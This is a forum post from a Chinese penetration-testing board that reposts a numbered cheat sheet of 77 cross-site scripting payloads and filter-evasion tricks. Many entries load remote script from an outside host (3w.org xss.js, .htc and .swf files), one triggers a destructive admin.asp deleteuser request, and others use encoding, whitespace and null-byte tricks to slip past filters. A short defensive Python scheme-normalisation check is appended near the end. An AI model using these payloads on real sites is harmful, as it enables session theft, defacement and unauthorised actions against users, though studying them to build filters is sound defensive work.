中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title:
XSS attack roundup
Author:
admin
Time:
2013-4-19 19:22
It seems there isn't much XSS material on t00ls; saw some good stuff and copied it over, not sure whether any of you need to Mark it.
(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript

<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript

<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line injected JavaScript; this is an extreme XSS example

<IMG SRC="javascript:alert('XSS')">

(16) Getting around character limits (requires the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267

(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically useless domestically, because there is nowhere to exploit them

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters before the JavaScript

<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS to 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS to 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript

\";alert('XSS');//
(30) End TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image

<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc

<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript

<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL

<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with split expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket and a leading letter)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method

exppression(alert("XSS"))'>

(53) STYLE background

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains XSS

<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside Flash you can smuggle your XSS code in

a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the HTC file must be on the same server as your XSS vector

<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put JS code inside an image to exploit it

<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands

<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)

Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters

<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)

<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)

<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)

<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)

<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)

<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass

<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding

<A HREF="http://3w.org">XSS</A>

(70) IP in decimal

<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal

<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal

<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding

<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping [http:]

<A HREF="//www.google.com/">XSS</A>

(75) Dropping [www]

<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot

<A HREF="http://www.google.com./">XSS</A>

(77) javascript link

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
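As an added defensive example (not part of the original post or the cheat sheet it copies), the Python check below normalises a URL-bearing attribute value the way a browser does before looking at its scheme, which is why the mixed-case, embedded-whitespace, null-byte and HTML-entity variants in items (3)-(5), (11)-(14), (17) and (19) all fall to the same test instead of needing one filter rule each. It covers scheme-based attributes (SRC, HREF, BACKGROUND and the like) only, not the CSS expression() and url() forms; the sample values at the bottom are constructed here.

```python
import html
import re

# Schemes named on this page whose URLs run script when a browser loads them.
SCRIPT_SCHEMES = {"javascript", "vbscript"}

# ASCII control characters and space (0x00-0x20): browsers ignore these inside
# a URL scheme, which is what makes the embedded tab / newline / carriage
# return / null byte and leading-space variants work against naive filters.
_IGNORED = re.compile(r"[\x00-\x20]")

# Syntactically valid scheme, per RFC 3986, after lower-casing.
_SCHEME = re.compile(r"[a-z][a-z0-9+.\-]*")


def canonical_scheme(value: str) -> str:
    """Return the lower-cased scheme of an attribute value after browser-style
    normalisation, or '' when the value has no explicit scheme (relative URL)."""
    # Browsers decode HTML character references (&#106; &#x6A; and the forms
    # without a trailing semicolon) in attribute values before the URL parser
    # sees them, so decode first.
    decoded = html.unescape(value)
    head, sep, _rest = decoded.partition(":")
    if not sep:
        return ""
    scheme = _IGNORED.sub("", head).lower()
    # A colon inside a relative path or query string is not a scheme separator.
    return scheme if _SCHEME.fullmatch(scheme) else ""


def is_script_url(value: str) -> bool:
    """True when the attribute value would execute script in a browser."""
    return canonical_scheme(value) in SCRIPT_SCHEMES


if __name__ == "__main__":
    # Constructed sample values (not taken from the page): the case, whitespace,
    # null-byte and entity-encoded variants beside a few benign URLs.
    samples = [
        "javascript:alert('XSS')", "JaVaScRiPt:alert('XSS')",
        "jav\tascript:alert('XSS')", "jav\nascript:alert('XSS')",
        "java\0script:alert('XSS')", " javascript:alert('XSS')",
        "&#106;avascript:alert('XSS')", "&#x6A;avascript:alert('XSS')",
        "http://3w.org/XSS/xss.js", "//3w.org/xss.js", "a.php?a=b",
    ]
    for value in samples:
        print(f"{is_script_url(value)!s:5}  {value!r}")
```

The point of the normalise-then-check order is that any filter applied before decoding and control-character stripping is checking a different string from the one the browser will resolve.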
Original source:
http://fuzzexp.org/u/0day/?p=14

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2